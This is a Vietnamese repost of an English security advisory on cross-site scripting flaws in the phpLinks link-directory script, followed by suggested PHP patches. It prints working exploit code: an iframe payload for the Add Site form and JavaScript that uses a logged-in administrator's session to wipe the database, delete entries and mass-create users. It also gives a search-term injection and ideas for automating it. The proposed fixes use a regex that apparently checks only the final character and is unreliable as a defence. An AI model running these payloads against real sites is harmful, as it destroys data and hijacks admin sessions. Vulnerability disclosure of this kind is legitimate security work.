.Lỗi bảo mật với Multiple PHPLink, cho phép truy cập với quyền admin :trang này đã được đọc lần phplinks là một free software được dùng rất phổ biến trong link farm or search engine có
Trang 1.Lỗi bảo mật với Multiple PHPLink, cho phép truy cập với quyền admin :
trang này đã được đọc lần
phplinks là một free software được dùng rất phổ biến trong link farm or search engine có lỗi bảo mật cho phép chèn scripts nguy hiểm vào scripts và có quyền giống như một admin sites!
sau đây là chi tiết nội dung :
phpLinks is an open source free PHP script phpLinks allows you to run a very powerful link farm or search engine phpLinks has multilevel site
categorization, infinite threaded search capabilities and
more phpLinks is very simple to setup
There lies a fault in the include/add.php script that allows a remote
attacker to inject code into the script and have it run as an admin The
vulnerability comes from improper input validation and improper session
authentication Below Is some example code that I have written
Put this in one of the field on "Add Site" form located at
http://blah/phplinks/index.php?show=add&PID=
If you inject the code into the Site Title or Site Url field, the code
will be ran as soon as a logged in administrator views it
<iframe src=http://blah/death.html></iframe>
Below is the code for the called file "death.html"
-<script language=JavaScript>
var i = 10; // This is the number of the user ID to start deleting
var BaseURL = "http://victimsite/phplinks/";
window.open(BaseURL + '/admin/reset.php?
reset_in=&reset_out=&search_terms=&referrers=&submit='); // this resets the database
function Waste()
{
while (i) {
i++;
window.open(BaseURL + 'admin/delete_site.php?dbtable=links&ID=' + i + '&sure=Yes');
}
}
</script>
<body onLoad="Waste();">
-As you can see, that code (when called by a logged in admin validating
sites) is run, the database is in alot of cases going to be left empty By
the way, the dbtable=links can be changed to dbtable=temp in order to
affect sites not yet approved etc On the other hand you can add users to the database and more Take the following code for example
Trang 2<iframe src=http://blah/life.html></iframe>
Below is the code for the called file "life.html"
-<script language=JavaScript>
var i = 1;
var BaseURL = "http://victimsite/phplinks/";
function Gluttony()
{
while (i) {
i++;
window.open(BaseURL + '/admin/add_site.php?SiteName=JeiAr0wnethTheee' +
i
+ '&SiteURL=http://www.b' + i + 'j.orfd&Description=' + i
+'3333333333333333333333333333333333&Category=&Country=Turkey.gif&E mail=1@t
.' + i + '&UserName=12345' + i
+ '&Password=12345678&Hint=12345678910&add=' + i + '&sure=Yes'); }
}
</script>
<body onLoad="Gluttony();">
-Once again, when a logged in admin goes to validate sites (unless they
have a popup killer, JS disabled, etc.) they are gonna be adding MANY
users to the database before they really realize what's happening This
also jolt's the server quit a bit by hogging up resources You can
basically change almost anything that the admin can by just injecting
code Also, note that these proof of concept scripts could be altered to
supply large numbers of malformed site submissions, and instead make it something worse like popunder windows etc But I do not feel it would be very good to release a script like that publicly :) Also note that for
whatever reason the most updated norton AV does not pick this script up as
a window bomb Maybe it's cause my JavaScript is so bastardized it doesn't recognize the code at all heheh j/k I put together a quick fix I am no
php guru, so if there is a better way then please correct me :)
In the includes/add.php file find the following
// Handle form submission
if(isset($submit_add)){
And right below it paste the following code
Trang 3// PHPLinks Critical XSS Vulnerability Fix - By JeiAr - jeiar@kmfms.com // //////////////////////////////////////////////////////////////////////////
$ip = $REMOTE_ADDR;
$info = $HTTP_USER_AGENT;
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $SiteName)) {$err.= "Please enter
A valid Site Name.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $SiteURL)) {$err.= "Please enter
A valid Site URL.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Description)) {$err.= "Enter A valid Description.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Category)) {$err.= "Enter A valid Category.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Country)) {$err.= "Enter A valid Country.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $UserName)) {$err.= "Enter A valid UserName.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $PW)) {$err.= "Please enter A valid Password.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $PW2)) {$err.= "Please enter A valid Password.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Hint)) {$err.= "Please enter A valid Hint.";}
if ($err) {
echo $err;
echo "<b>Possible Hack Attempt!!</b>";
echo "<b>$ip</b>";
echo "<b>$info</b>";
echo "Back";
exit;
}
/////////////////////////////////////////////////////////////////////////
There is also a much less serious, but similar issue with the search
feature You can basically execute just about any JavaScript or HTML code and maybe more? Here is an example
http://www.blah.org/index.php?term=<scr </script>
And if you write a script to send many automated malformed search strings, the code will show up with the most searched for terms on the main search page, thus running any code you supply on the sites visitors browsers Below is a quick fix for that, I basically just ereg the input for invalid
metacharacters
in includes/results.php find the following
if(isset($term) && strlen($term)>0){
Below it place the following
/////////////////////////////////////////////////////////////////////////
Trang 4// PHPLinks XSS Vulnerability Fix - By JeiAr - jeiar@kmfms.com 01-2003 // /////////////////////////////////////////////////////////////////////////
$ip = $REMOTE_ADDR;
$info = $HTTP_USER_AGENT;
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $term)) {$err.= "Please enter A valid Search Term.";}
if ($err) {
echo $err;
echo "<b>Possible Hack Attempt!!</b>";
echo "<b>$ip</b>";
echo "<b>$info</b>";
echo "Back";
exit;
}
////////////////////////////////////////////////////////////////////////
One bad thing about the most searched for keywords feature, is that anyone can put their web page, name, or something obscene as a search term After clicking submit xxx number of times, they now have whatever they
want on your main search page Not really a security issue, but could be annoying Don't ya think? And if someone used some CSS they could
basically deface the site in a really lame kinda way
Note that this has only been tested on the latest version of phplinks
Older versions may not be affected but I kinda doubt it
JeiAr - CyberArmy Security Research ACAT Team
http://www.gulftech.org
http://www.security-research.org
Error! Unknown switch argument.